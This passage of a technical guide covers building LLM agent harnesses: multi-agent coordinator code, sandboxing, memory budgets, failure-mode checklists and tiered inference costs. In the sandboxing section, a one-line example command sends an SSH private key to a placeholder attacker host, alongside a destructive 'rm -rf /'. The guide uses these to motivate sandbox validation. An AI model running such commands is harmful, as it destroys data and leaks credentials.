          │  Agent          │
          └────────┬────────┘
         ┌─────────┼─────────┐
         ↓         ↓         ↓
    ┌──────────┐┌──────────┐┌──────────┐
    │ Research ││ Code Gen ││  Verify  │
    │Specialist││Specialist││Specialist│
    └──────────┘└──────────┘└──────────┘
         ↓         ↓         ↓
    [Results combine → Final output]

Characteristics:

  • Multiple specialized agents with distinct roles
  • Central coordinator routes tasks
  • Each agent maintains isolation (workspace, memory, tools)
  • Agents can work in parallel

Use case: Complex business processes, multi-discipline projects, scaling

Coordinator and Specialist Implementation

@dataclass
class AgentSpec:
    name: str
    system_prompt: str
    tools: list[str]           # Tool names this agent can use
    allowed_paths: list[str]   # Filesystem access scope


class SpecialistAgent:
    """A single specialist with its own sandbox and tool set."""

    def __init__(self, spec: AgentSpec, llm: LLMProvider, registry: ToolRegistry):
        self.spec = spec
        # Each specialist gets a restricted tool set
        filtered_tools = ToolRegistry()
        for name in spec.tools:
            tool = registry.get(name)
            if tool:
                filtered_tools._tools[name] = tool

        self.harness = Harness(
            llm=llm,
            tools=filtered_tools,
            memory=FileMemoryManager(workspace=f"./agents/{spec.name}"),
            sandbox=Sandbox(SandboxPolicy(
                allowed_tools=set(spec.tools),
                allowed_paths=spec.allowed_paths,
                blocked_commands=["rm -rf", "sudo"],
                max_file_size_bytes=5 * 1024 * 1024,
                require_approval=set(),
                network_allowed="web_search" in spec.tools,
            )),
            workspace=WorkspaceManager(root=f"./agents/{spec.name}"),
        )

    async def execute(self, task: str) -> str:
        return await self.harness.run_session(task)


class CoordinatorAgent:
    """Routes tasks to specialists and combines their results."""

    SPECIALISTS = [
        AgentSpec(
            name="researcher",
            system_prompt="You research topics and return structured findings.",
            tools=["web_search", "read_file", "write_file"],
            allowed_paths=["./agents/researcher", "/tmp"],
        ),
        AgentSpec(
            name="coder",
            system_prompt="You write clean, tested Python code.",
            tools=["read_file", "write_file", "run_command"],
            allowed_paths=["./agents/coder", "./project", "/tmp"],
        ),
        AgentSpec(
            name="reviewer",
            system_prompt="You review code for bugs, security issues, and style.",
            tools=["read_file"],
            allowed_paths=["./agents/coder", "./project"],
        ),
    ]

    def __init__(self, llm: LLMProvider, registry: ToolRegistry):
        self.llm = llm
        self.agents = {
            spec.name: SpecialistAgent(spec, llm, registry)
            for spec in self.SPECIALISTS
        }

    async def run(self, user_intent: str) -> str:
        # Step 1: Coordinator decides which specialists to invoke and in what order
        plan = await self.llm.complete(
            messages=[
                Message(role="system", content=(
                    "You are a coordinator. Given a user request, produce a JSON plan. "
                    "Available specialists: researcher, coder, reviewer. "
                    "Output format: {\"steps\": [{\"agent\": \"name\", \"task\": \"description\"}]}"
                )),
                Message(role="user", content=user_intent),
            ],
            tools=[],
        )
        steps = json.loads(plan.content)["steps"]

        # Step 2: Execute steps (sequential — each may depend on prior output)
        context = ""
        for step in steps:
            agent = self.agents[step["agent"]]
            task_with_context = f"{step['task']}\n\nContext from previous steps:\n{context}"
            result = await agent.execute(task_with_context)
            context += f"\n--- {step['agent']} output ---\n{result}\n"

        # Step 3: Coordinator synthesizes final answer
        synthesis = await self.llm.complete(
            messages=[
                Message(role="system", content="Synthesize these specialist outputs into a final answer."),
                Message(role="user", content=context),
            ],
            tools=[],
        )
        return synthesis.content

Key design decisions in multi-agent:

  • Each specialist has its own workspace directory (./agents/<name>/)
  • Tool access is restricted per role (reviewer cannot write files)
  • Filesystem isolation prevents one agent from corrupting another’s state
  • The coordinator uses the LLM to plan, but does not execute tools itself

Best Practices for Effective Harnesses

1. Incremental Progress Over One-Shotting

  • Prompt agents to work on one feature at a time
  • Reduces context exhaustion (restart fresh from smaller checkpoints)
  • Produces cleaner, more testable code
  • Commits: Use feature-per-commit pattern

2. Verification Before Advancement

  • Require self-verification through actual testing (not code review)
  • Use browser automation or integration tests where applicable
  • Prevent marking features complete without validation
  • Pattern: Generate → Test → Fix loop (Reflexion style)

3. Clear State Management

  • Comprehensive progress documentation (feature list, completion status)
  • Git commits as checkpoints (can rollback, inspect history)
  • Feature lists: JSON or markdown with completion flags
  • Keep current across sessions (auto-dream updates)

4. Session Startup Protocol

Order matters — establish context in this sequence:

1. Load instructions (CLAUDE.md) — rules, conventions
2. Load memory index (MEMORY.md) — pointers to knowledge
3. Review current state
   - Feature/todo list (what's complete, what's next?)
   - Progress file (what did last session do?)
   - Recent commits (understand history)
4. Run basic functionality tests
   - Ensure project actually builds/runs
   - Verify no regressions from last session
5. Then proceed with new work
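The protocol above can be sketched as a loader that assembles startup context in order. File names follow this document's conventions (CLAUDE.md, MEMORY.md, feature_list.json); `progress.md` is an assumed name for the progress file, and the smoke-test step (4) is left to the caller:

```python
from pathlib import Path

def startup_context(root: str) -> dict:
    """Load startup context in the prescribed order.

    Missing files yield empty strings rather than crashing, matching
    the "MEMORY.md file missing -> no crash" failure-mode requirement.
    """
    base = Path(root)

    def read(name: str) -> str:
        p = base / name
        return p.read_text() if p.exists() else ""

    return {
        "instructions": read("CLAUDE.md"),          # 1. rules, conventions
        "memory_index": read("MEMORY.md"),          # 2. pointers to knowledge
        "feature_list": read("feature_list.json"),  # 3. current state
        "progress": read("progress.md"),            # 3. last session's work
        # 4. run basic functionality tests (caller's responsibility)
        # 5. then proceed with new work
    }
```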

5. Context Management

  • Load only necessary memory at session start

    • Instructions: 5K tokens
    • Memory index: <1K tokens
    • Project state: 2-5K tokens
    • Total startup: <10K tokens (leaves 90%+ for work)
  • Keep index files under 200 lines

    • MEMORY.md stays compact
    • Move detailed notes to topic files
    • Load topic files on-demand, not at startup
  • Auto-dream consolidation (every 24h or 5 sessions)

    • Merge overlapping entries
    • Remove outdated/contradicted facts
    • Convert relative dates to absolute
    • Keep index under 200 lines

6. Error Recovery

  • Graceful degradation: Tools fail, agent continues
  • Retry logic: Some failures are transient
  • Backoff strategy: Exponential backoff for rate-limited APIs
  • Logging: Detailed logs for debugging
  • Clear error messages: So agent understands what failed and why
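A minimal retry helper combining these practices, exponential backoff with jitter for transient failures; the function name and signature are illustrative:

```python
import asyncio
import random

async def with_retries(fn, max_attempts: int = 4, base_delay: float = 1.0):
    """Retry an async callable with exponential backoff plus jitter.

    Transient failures (rate limits, timeouts) get retried; the last
    exception propagates so the orchestration layer can log it.
    """
    for attempt in range(max_attempts):
        try:
            return await fn()
        except Exception:
            if attempt == max_attempts - 1:
                raise  # exhausted: surface the error with full context
            delay = base_delay * (2 ** attempt) + random.uniform(0, 0.5)
            await asyncio.sleep(delay)
```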

Common Architecture Mistakes

These are the mistakes harness builders make most often. Each one leads to production failures.

Mistake 1: No Sandbox for Tool Execution

What goes wrong: The LLM calls run_command with rm -rf / or curl attacker.com/exfil?data=$(cat ~/.ssh/id_rsa). Without a sandbox, the command executes with the harness process’s full permissions.

Fix: Every tool call passes through a validation layer before execution. Use allowlists (not blocklists) for shell commands. Run code execution in a container or restricted subprocess.

# BAD: Direct execution
result = subprocess.run(tool_call["arguments"]["command"], shell=True)

# GOOD: Validated execution
if not sandbox.allow(tool_call):
    return ToolResult(error="Blocked by policy")
result = subprocess.run(
    tool_call["arguments"]["command"],
    shell=True,
    timeout=30,
    cwd="/sandboxed/workspace",
    env=RESTRICTED_ENV,
)

Mistake 2: Memory Grows Unbounded

What goes wrong: Every message, tool result, and observation stays in the context window. By iteration 15, the context is full. The LLM either crashes or starts ignoring early context.

Fix: Implement a token budget per memory layer. Trim the message history with a sliding window. Summarize long tool outputs before adding them to context.

# BAD: Keep everything
messages.append(Message(role="tool", content=huge_file_contents))

# GOOD: Truncate and summarize
MAX_TOOL_OUTPUT = 4000  # characters
content = huge_file_contents
if len(content) > MAX_TOOL_OUTPUT:
    content = content[:MAX_TOOL_OUTPUT] + f"\n... [truncated, {len(huge_file_contents)} chars total]"
messages.append(Message(role="tool", content=content))

Mistake 3: No Rate Limiting on LLM Calls

What goes wrong: The loop runs as fast as possible, hitting the API rate limit. Each retry triggers another rate limit. Costs spike. The loop stalls for minutes.

Fix: Implement a rate limiter with exponential backoff.

import asyncio
import logging
import time

logger = logging.getLogger("harness")

class RateLimiter:
    def __init__(self, max_calls_per_minute: int = 30):
        self.max_rpm = max_calls_per_minute
        self.calls: list[float] = []

    async def wait(self):
        now = time.time()
        # Remove calls older than 60 seconds
        self.calls = [t for t in self.calls if now - t < 60]
        if len(self.calls) >= self.max_rpm:
            wait_time = 60 - (now - self.calls[0])
            logger.info(f"Rate limit: waiting {wait_time:.1f}s")
            await asyncio.sleep(wait_time)
        self.calls.append(time.time())

Mistake 4: Logging Is an Afterthought

What goes wrong: Something fails in production. You have no idea which tool was called, what arguments were passed, what the LLM was thinking, or where in the loop the failure occurred. Debugging becomes guesswork.

Fix: Log at every boundary: LLM call, tool dispatch, sandbox decision, memory load/store, session lifecycle events.

import logging
import json

logger = logging.getLogger("harness")

# Log structure for every LLM call
logger.info(json.dumps({
    "event": "llm_call",
    "iteration": state.iteration,
    "input_tokens": response.usage["input_tokens"],
    "output_tokens": response.usage["output_tokens"],
    "tool_calls": [c["name"] for c in response.tool_calls],
    "stop_reason": response.stop_reason,
}))

# Log structure for every tool execution
logger.info(json.dumps({
    "event": "tool_exec",
    "tool": call["name"],
    "sandbox_decision": "allowed",
    "duration_ms": int((end - start) * 1000),
    "is_error": result.is_error,
}))

Mistake 5: No Max Iteration Guard

What goes wrong: The LLM gets stuck in a loop (e.g., repeatedly trying to fix a test that cannot pass). It burns 200+ API calls before someone notices.

Fix: Hard cap on iterations, plus a “stuck detector” that aborts if the same tool call is repeated 3+ times.
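A sketch of such a stuck detector, keyed on tool name plus serialized arguments; the class name and default threshold are illustrative:

```python
import json
from collections import deque

class StuckDetector:
    """Flag the loop as stuck when the same tool call repeats.

    Keeps a window of recent calls; three identical calls in a row
    usually means the agent is looping rather than progressing.
    """
    def __init__(self, threshold: int = 3, window: int = 10):
        self.threshold = threshold
        self.recent: deque[str] = deque(maxlen=window)

    def record(self, name: str, arguments: dict) -> bool:
        """Record a tool call; return True if the loop appears stuck."""
        key = name + json.dumps(arguments, sort_keys=True)
        self.recent.append(key)
        tail = list(self.recent)[-self.threshold:]
        return tail == [key] * self.threshold
```

The orchestration layer checks `record()` on every dispatch and aborts (or forces a re-plan) when it returns True, alongside the hard iteration cap.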

Mistake 6: Mixing Concerns in the Planning Loop

What goes wrong: The loop function handles LLM calls, tool dispatch, memory management, logging, error recovery, and state persistence all in one 500-line function. A change to tool dispatch breaks memory consolidation.

Fix: Each of the 7 components has a clean interface (as shown above). The loop calls interfaces, not implementations. Swap any component without touching the others.

Mistake 7: No Context Budget Enforcement

What goes wrong: The system prompt is 8K tokens, MEMORY.md is 3K, the feature list is 2K, and the conversation history is 80K. Total: 93K. The model’s context window is 100K. There is only 7K left for the LLM to reason and respond. Output quality degrades sharply.

Fix: Set explicit budgets and enforce them:

CONTEXT_BUDGET = {
    "system_prompt": 2_000,
    "long_term_memory": 3_000,
    "working_memory": 5_000,
    "conversation_history": 70_000,
    "reserved_for_output": 20_000,
}
# Total: 100K = full context window

# Before each LLM call, verify:
total = sum(count_tokens(layer) for layer in all_layers)
if total > (CONTEXT_LIMIT - CONTEXT_BUDGET["reserved_for_output"]):
    trim_oldest_messages(conversation_history)
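The enforcement snippet above leaves `count_tokens` and `trim_oldest_messages` undefined. A minimal sketch, approximating tokens as characters divided by four and treating messages as plain strings; swap in a real tokenizer (e.g. tiktoken) for accurate counts:

```python
def count_tokens(text: str) -> int:
    """Rough heuristic: ~4 characters per token for English text."""
    return len(text) // 4

def trim_oldest_messages(messages: list, budget: int) -> list:
    """Drop messages from the front until the history fits the budget.

    Always keeps the most recent message so the loop can continue.
    Mutates and returns the list.
    """
    while len(messages) > 1 and sum(count_tokens(m) for m in messages) > budget:
        messages.pop(0)
    return messages
```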

Production Architecture Checklist

Use this checklist to validate your harness before running it on real tasks.

Component Coverage

  • Component 1 (LLM): Provider configured with API key, model selected, fallback provider ready
  • Component 2 (Tools): At least 5 tools registered, each with input schema, validation, and error handling
  • Component 3 (Memory): All 4 layers implemented (short-term, working, long-term, auto-consolidation)
  • Component 4 (Planning Loop): ReAct or chosen framework runs stable over 20+ iterations without crashing
  • Component 5 (Sandbox): Policy defined, all tool calls validated before execution, audit log writing
  • Component 6 (Persistence): Workspace initialized, sessions saved, state files use atomic writes
  • Component 7 (Orchestration): Session lifecycle managed, error boundaries in place, graceful shutdown

Failure Mode Testing

For each component, verify the harness survives these failures:

Component     | Failure to test                | Expected behavior
--------------|--------------------------------|------------------------------------------------
LLM           | API returns 429 (rate limit)   | Exponential backoff, retry after delay
LLM           | API returns 500 (server error) | Fallback to secondary provider
LLM           | Response exceeds max tokens    | Truncation handled, loop continues
Tools         | Tool not found                 | Error message returned, loop re-prompts
Tools         | Tool times out                 | Subprocess killed, timeout error returned
Tools         | Tool returns malformed output  | Error wrapped, loop re-prompts
Memory        | MEMORY.md file missing         | Empty memory loaded, no crash
Memory        | Context window nearly full     | Oldest messages trimmed automatically
Loop          | Max iterations reached         | Loop exits cleanly with partial result
Loop          | Same tool call repeated 3x     | Stuck detector triggers, forces new approach
Sandbox       | Path traversal attempt         | Blocked, logged, loop continues
Sandbox       | Blocked command attempted      | Blocked, logged, error message to LLM
Persistence   | Disk full                      | Error caught, session saved to /tmp fallback
Persistence   | Crash during write             | Atomic rename prevents corruption
Orchestration | SIGINT during session          | Graceful shutdown, state flushed
Orchestration | Unhandled exception in tool    | Caught at orchestration level, session continues

Validation Criteria

Performance:

  • Full harness startup <5 seconds (memory load + initialization)
  • Single agent loop iteration <30 seconds end-to-end
  • Error recovery doesn’t cascade: one tool failure doesn’t crash the harness
  • Context budgeting holds: never exceed 90% of available window

Implementation:

  • All 7 components implemented: LLM, tools, memory, loop, sandbox, persistence, orchestration
  • Tool registry defines 5+ tools with clear input/output schema
  • ReAct loop or chosen framework runs stable over 20+ iterations
  • Session persistence works: can resume after restart
  • Sandboxing prevents unsafe operations (file deletion, system calls)
  • At least one pattern (Single-Agent, Initializer-Executor, or Multi-Agent) fully functional

Integration:

  • LLM accepts tool definitions and makes valid tool calls
  • Tools return results in format agent can parse
  • Memory system loads at startup, persists after session
  • Error recovery: one component failure doesn’t cascade to others
  • Logging works: can trace full request from input to output

Sign-Off Criteria

  • Harness architecture documented with your component choices
  • All 7 components deployed and tested on real task
  • Chosen pattern (Single/Initializer-Executor/Multi-Agent) validated end-to-end
  • Performance benchmarks met: startup, latency, error handling
  • Production checklist complete: monitoring, logging, error recovery

Tiered Inference Architecture

Not everything needs an LLM. Not everything that needs an LLM needs the same LLM. A tiered architecture routes each problem to the cheapest tier that can handle it.

The Three Tiers

Tier 1: Deterministic (code). Zero cost. Instant. Perfect reliability. Python, SQL, rule engines, lookup tables. Handles everything with a known rule — date arithmetic, pattern matching, scoring algorithms, geographic lookups, input validation.

Tier 2: Local inference (7B-14B reasoning model). Zero marginal cost (hardware already owned). Slower (~173s per call for 14B). Excellent at deep, focused reasoning about one problem — reading evidence, chaining through logic, suggesting actions. Limited context window. Cannot reason broadly across many inputs.

Tier 3: API inference (70B+, Claude, GPT-4). Per-token cost. Fast. Excellent at broad reasoning — seeing patterns across large contexts, cross-referencing many items, strategic planning. Use for the work that Tier 2 genuinely cannot do.

Routing Rule

Route up only when you hit the wall. Start every task at Tier 1. If deterministic code can handle it, stop. If not, route to Tier 2. If the local model hits its limits (context too large, reasoning too broad, instructions not followed), route to Tier 3.

Most work stays at Tier 1. Tier 2 handles the edge cases Tier 1 can’t resolve. Tier 3 handles the strategic reasoning Tier 2 can’t do. The result: near-zero cost for 95% of work, with full capability available when needed.
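The routing rule can be sketched as a small dispatch function. The predicates here (`has_known_rule`, the 8K context threshold, `needs_broad_reasoning`) are illustrative stand-ins for domain-specific checks such as a regex table or lookup:

```python
def route(task: dict) -> str:
    """Route a task to the cheapest tier that can handle it.

    Route up only when you hit the wall: deterministic code first,
    local model next, API model last.
    """
    if task.get("has_known_rule"):
        return "tier1_deterministic"   # known rule: zero cost, instant
    if task.get("context_tokens", 0) <= 8_000 and not task.get("needs_broad_reasoning"):
        return "tier2_local"           # deep, focused reasoning on one problem
    return "tier3_api"                 # broad reasoning across large contexts
```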

The Deterministic-Probabilistic-Deterministic Sandwich

When using an LLM (Tier 2 or 3) for factual research, sandwich it between deterministic layers:

DETERMINISTIC IN → PROBABILISTIC MIDDLE → DETERMINISTIC OUT
  1. Deterministic in: Python searches sources, scores results through pass/fail gates, generates leads with evidence and failed gates attached.
  2. Probabilistic middle: LLM reads the evidence, reasons about what to search next. Python executes the suggested search. Results scored through the same gates. New evidence feeds back. Loop until resolved.
  3. Deterministic out: All accumulated evidence re-scored through deterministic gates. Facts extracted. Human reviews.

The LLM never decides what is true — it only suggests what to search for. A wrong suggestion wastes one search. A wrong fact corrupts data. Put the probabilistic layer where wrong answers are cheap.
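The three layers can be sketched as a loop in which `search` and `score` are deterministic Python callables and `suggest_next` is the only LLM-backed step; all three names, and the item-as-string convention, are illustrative:

```python
def research_loop(item, search, score, suggest_next, max_rounds: int = 5):
    """Deterministic-probabilistic-deterministic sandwich.

    The LLM never asserts facts; it only proposes the next query
    (returning None when it judges the item resolved). Python executes
    searches and scores all evidence through the same gates.
    """
    evidence = score(search(item))               # deterministic in
    for _ in range(max_rounds):
        query = suggest_next(item, evidence)     # probabilistic middle
        if query is None:
            break                                # LLM says: resolved
        evidence = score(evidence + search(query))
    return score(evidence)                       # deterministic out
```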

Input Clustering

Group related inputs before sending to the LLM. A cluster of related items gives richer context without additional compute:

  • Without clustering: 14 individual LLM calls, each with thin context about one person
  • With clustering: 1 LLM call with rich context about the whole household

The LLM sees connections between items that individual calls would miss. One search suggestion can resolve multiple items. Fewer total LLM calls with better results.

Cluster by natural groupings in your domain — households, departments, related tickets, linked documents. The grouping key is whatever makes the items mutually informative.
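A minimal clustering helper, assuming each input item is a dict carrying its grouping key:

```python
from collections import defaultdict

def cluster(items: list[dict], key: str) -> list[list[dict]]:
    """Group items by a shared key (household, department, ticket
    group) so one LLM call sees the whole cluster's context instead
    of many calls each seeing one thin slice."""
    groups: dict = defaultdict(list)
    for item in items:
        groups[item[key]].append(item)
    return list(groups.values())
```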


Performance Optimizations (2025+)

  • Quantization: Use 4-bit AWQ models for cost/speed trade-off
  • KV cache quantization: INT8/INT4 cache, PagedAttention for memory and compute savings
  • Grouped Query Attention: Reduce KV cache footprint
  • Context trimming: Auto-cleanup old irrelevant context
  • Batch operations: Group tool calls when possible
  • Caching: Cache tool results across loops

How Components Map to Other Documents

Each component has deeper coverage in a dedicated document. Use this table to navigate:

Component            | Role                | Detailed In                      | What You’ll Find
---------------------|---------------------|----------------------------------|------------------------------------------------------------------------------------------
1. LLM/AI Model      | Reasoning engine    | Doc 01 (01_foundation_models.md) | Model selection (LLM vs SLM), multimodal capabilities, cost/speed trade-offs, quantization options
2. Tool Integration  | External capabilities | Doc 08 (08_claw_code_python.md) | Tool registry patterns, filesystem-based tool discovery, MCP protocol for extensibility
3. Memory Management | Context persistence | Doc 04 (04_memory_systems.md)    | Four-layer architecture details, RAG vs LLM Wiki pattern, consolidation algorithms
4. Planning Loop     | Agentic reasoning   | Doc 05 (05_ai_agents.md)         | ReAct, Tree of Thought, Reflexion frameworks, when to use each
5. Sandboxing        | Safety/validation   | Doc 08 (08_claw_code_python.md)  | Permission models and approval flows
6. Persistence       | State/filesystem    | Doc 07 (07_openclaw_reference.md) | File-based architecture, workspace layout conventions
7. Orchestration     | System coordination | Doc 08 (08_claw_code_python.md)  | Session lifecycle, multi-provider routing, error recovery

Reading order for builders:

  1. Start here (Doc 06) for the big picture
  2. Read Doc 05 to choose your planning framework
  3. Read Doc 04 to design your memory system
  4. Read Doc 01 to select your model(s)
  5. Read Doc 08 to see a working reference implementation
  6. Read Doc 03 (03_huggingface_ecosystem.md) if running models locally
  7. Read Doc 02 (02_kv_cache_optimization.md) for performance tuning

Why Purpose-Built Harnesses Are More Efficient Than General-Purpose LLMs

A dedicated harness uses roughly 25x fewer tokens per call than asking a general-purpose LLM like Claude Code to do the same work. This is not a theoretical claim — it follows directly from what each system must include in every request.

Token Breakdown: General-Purpose vs Dedicated

Component            | General-Purpose LLM                         | Dedicated Harness
---------------------|---------------------------------------------|------------------------------------------
System prompt        | ~5,000 tokens (full assistant instructions) | ~110 tokens (domain rules only)
Tool definitions     | ~3,000 tokens (20-40 tools in prompt)       | 0 (Python dispatches tools directly)
Conversation history | ~8,000 tokens (growing each turn)           | 0 (rebuilt from state each call)
File contents        | ~6,000 tokens (reading code/context)        | 0 (results pre-rendered as compact text)
Response             | ~2,000 tokens (explanatory text)            | ~650 tokens (structured JSON)
Total                | ~24,500 tokens/turn                         | ~997 tokens/call

Why the Difference Is So Large

A general-purpose LLM carries everything it might need in every request: tool definitions for 20-40 tools it could potentially call, conversation history so it remembers what happened, file contents it read earlier, and a system prompt covering coding conventions, git workflow, security rules, and more. Most of this context is irrelevant to any single task, but it must all be present because the LLM does not know in advance which parts it will need.

A dedicated harness eliminates this overhead entirely. Python code handles tool dispatch, state management, and result formatting. The LLM receives only what it needs for one specific decision: a focused prompt, the current state rendered as compact text, and the latest results. Everything else lives in Python variables and on disk.

At Scale: The Multiplier Effect

Consider a real workload: analysing 200 research subjects, each requiring 5 LLM calls.

Approach            | Tokens per call | Total calls | Total tokens
--------------------|-----------------|-------------|-------------
General-purpose LLM | ~24,500         | 1,000       | ~24.5M
Dedicated harness   | ~997            | 1,000       | ~1.0M

That is a 24.5x reduction in token consumption. At Claude Sonnet API rates ($3/$15 per 1M input/output tokens), the general-purpose approach costs roughly $100 (≈22.5M input tokens plus 2M output tokens); the dedicated harness costs roughly $11 (≈0.35M input plus 0.65M output). The cost gap is smaller than the token gap because output tokens, priced 5x higher, shrink the least.

The lesson: don’t use a Swiss Army knife when you need a scalpel. It costs more, it’s slower, and it cuts worse.


See Also

  • Doc 01 (Foundation Models): Component 1 — model selection and capabilities
  • Doc 02 (KV Cache Optimization): Performance tuning for local models
  • Doc 03 (HuggingFace Ecosystem): Model sourcing and quantization
  • Doc 04 (Memory Systems): Component 3 architecture and layer implementation
  • Doc 05 (AI Agents): Component 4 framework choices (ReAct, ToT, etc)
  • Doc 07 (Open-Source Agent Architectures): Component 6 file-based persistence patterns
  • Doc 08 (Python Agent Harness): Reference implementation of all 7 components